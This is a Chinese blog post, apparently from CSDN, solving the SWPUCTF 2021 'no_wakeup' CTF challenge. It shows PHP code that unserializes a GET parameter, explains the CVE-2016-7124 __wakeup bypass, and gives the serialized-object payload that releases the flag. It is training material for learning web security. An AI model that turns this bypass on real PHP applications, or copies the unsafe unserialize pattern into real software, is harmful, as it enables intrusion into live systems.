(反序列化)[SWPUCTF 2021 新生赛]no_wakeup

最新推荐文章于 2024-10-16 20:27:35 发布
最新推荐文章于 2024-10-16 20:27:35 发布
阅读量536 收藏 8
点赞数 4
分类专栏: web反序列化 文章标签: 学习 其他 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73668856/article/details/134854687
版权

打开题目

<?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

?>

__destruct->__wakeup(要绕过)

反序列时先检测有没有wakeup方法,有就先调用

但是CVE-2016-7124影响版本:PHP5 < 5.6.25;PHP7 < 7.0.10

p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

即可

_MOB_
关注
专栏目录
详解PHP序列化和反序列化原理
10-18
如果对象中定义了__wakeup方法,那么在对象被反序列化之后,__wakeup会被自动调用。 值得注意的是,PHP中的序列化机制在安全性上存在漏洞,如果序列化的数据来源于不可信的源,可能会导致反序列化过程中出现安全...
NSSCTF ez_unserialize
m0_49257076的博客
11-02 1157
打开题目是胡桃摇的表情包(手动滑稽????),下面是“题目在哪” 这边是上手直接使用蚁剑扫描得到的robots.txt文件,然后打开之后有cl45s.php文件,访问之后可以看到题目的源码 观察源码就知道是一个简单的unserialize,手写一下(菜狗枯了) <?php class wllm{ public $admin; public $passwd; public function __construct(){ $this->admin ...
PHP反序列化
cxiaodi的博客
06-11 212
分析代码可知,需要将构造函数中的变量进行修改,符合if条件之后可以得到flag。
NSS刷web(1)
arcuied
06-19 445
nss刷web
PHP反序列化新手入门学习总结
蚁景网安学院
01-28 2927
最近写了点反序列化的题,才疏学浅,希望对CTF新手有所帮助,有啥错误还请大师傅们批评指正。首先我们需要理解什么是序列化,序列化是将变量或对象转换成字符串的过程,用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。
[PHP 反序列化参考手册]
cxiaodi的博客
02-16 1227
CTF中常见php反序列化模板题目总结
深入解析PHP中SESSION反序列化机制
10-20
例如,如果使用了`__wakeup()`魔术方法,在反序列化对象时,该方法会被自动调用。如果`__wakeup()`方法被用于执行恶意代码,这将构成一个安全风险。因此,开发者需要确保此类方法不会被恶意利用。 ```php class ...
php中序列化与反序列化详解
10-20
需要注意的是,PHP反序列化一个对象时,会自动调用对象的__wakeup()方法(如果该对象类定义了这个方法),以允许对象恢复它在序列化时未能保留的状态,如打开的数据库连接等。 在使用序列化数据进行网络传输时,...
详解php反序列化
10-15
反序列化则是将序列化后的字符串转换回原始的变量结构。这通常涉及到unserialize()函数,它能够将序列化的字符串重新构建成PHP变量。需要注意的是,在反序列化对象时,必须先定义对象所属的类,否则会抛出错误。 ...
序列化一个类_php的类的序列化脚本_
09-30
- `__wakeup()`:在反序列化后被调用,通常用于重新初始化对象的状态,尤其是那些不能序列化的属性或资源。 ```php class MyClass { private $var1; private $resource; // 假设这是一个不能序列化的资源 ...
【人工智能学习之PaddleOCR快速上手】
Jiagym的博客
10-12 1276
在配置文件中,可以设置组建模型、优化器、损失函数、模型前后处理的参数,PaddleOCR从配置文件中读取到这些参数,进而组建出完整的训练流程,完成模型训练,在需要对模型进行优化的时,可以通过修改配置文件中的参数完成配置,使用简单且方便修改。而 L2 正则化中,添加正则化项的目的在于减少参数平方的总和。准确检测的标准是检测框与标注框的IOU大于某个阈值,正确识别的检测框中的文本与标注的文本相同。如果缺少带标注的数据,或者不想投入研发成本,建议直接调用开放的API,开放的API覆盖了目前比较常见的一些垂类。
MySQL数据库的详细学习步骤
2401_87352036的博客
10-11 1240
MySQL数据库的详细学习步骤可以归纳为以下几个阶段,每个阶段都包含了特定的学习内容和目标。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1082
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
SpringCloud的学习(四)Micrometer、GateWay
二狗mao的博客
10-10 1179
步骤:新建类名xxx需要以RoutePredicateFactory结尾,并继承AbstractRoutePredicateFactory类。@Component //此注解不可忘重写apply方法@Override新建apply所需要的静态内部类MyRoutePredicateFactory.Config,这个类就是我们路由断言规则。(重要)@Validated@Setter@Getter@NotEmpty//钻、金、银等用户等级空参构造方法,内部调用super。
论文及其创新点学习cvpr2022 On the Integration of Self-Attention and Convolution
qq_53536373的博客
10-13 454
论文创新点,将注意力机制 和卷积 相结合。
stm32单片机个人学习笔记9(TIM输入捕获)
2302_80867398的博客
10-13 243
从模式选择Reset模式可以实现自动清零计数器CNT。
苍穹外卖学习笔记(二十一)
₍˄·͈༝·͈˄*₎◞ ̑̑的博客
10-13 344
取消订单与再来一单
学习笔记——交换——STP(生成树)基本概念
灵韵的博客
10-16 905
端口收到一个BPDU报文后,抽取该BPDU报文中累计根路径开销字段的值,加上该端口本身的路径开销即为累计根路径开销。从一个非根桥到达根桥的路径可能有多条,每一条路径都有一个总的开销值,此开销值是该路径上所有接收BPDU端口的端口开销总和(即BPDU的入方向端口)。STP交换机每一个端口都对应一个开销值,这个值表示数据通过端口发送时的开销,这个值与端口带宽有关,带宽越高,开销值越小。根路径开销是根据交换机之间的网段来说的,本地路径的开销也叫端口开销是针对本地的物理链路来说的相关的IETF的规定为。
小新学习Docker之Docker--harbor私有仓库部署与管理
最新发布
pangdongqiqi的博客
10-16 793
Harbor 是 VMware 公司开源的企业级 Docker Registry 项目,其目标是帮助用户迅速搭建一个企业级的 Docker Registry 服务。Harbor以 Docker 公司开源的 Registry 为基础,提供了图形管理 UI 、基于角色的访问控制(Role Based AccessControl) 、AD/LDAP 集成、以及审计日志(Auditlogging) 等企业用户需求的功能,同时还原生支持中文。
理解PHP反序列化漏洞:__wakeup()与安全风险
如果一个程序中存在可控的反序列化变量,并且某个类的`__wakeup()`方法中包含敏感操作,比如调用了像`exec()`这样的系统命令执行函数,或是使用了`file_put_contents()`等文件操作函数,那么攻击者可以通过构造特定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_MOB_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值